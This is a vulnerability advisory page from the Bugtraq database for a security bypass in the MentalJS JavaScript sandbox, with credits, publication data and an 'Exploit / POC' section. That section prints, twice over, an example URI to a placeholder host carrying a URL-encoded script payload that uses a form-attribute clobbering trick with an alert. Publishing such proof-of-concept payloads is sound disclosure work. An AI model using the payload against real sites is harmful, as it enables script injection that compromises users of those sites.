MentalJS Sandbox Security Bypass Vulnerability
BID:62581
Info
MentalJS Sandbox Security Bypass Vulnerability
| Bugtraq ID: | 62581 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 20 2013 12:00AM |
| Updated: | Sep 20 2013 12:00AM |
| Credit: | Rafay Baloch and Gliuseppe Ohpe |
| Vulnerable: |
MentalJS MentalJS 0 |
| Not Vulnerable: | |
Exploit / POC
MentalJS Sandbox Security Bypass Vulnerability
An attacker can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
An attacker can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E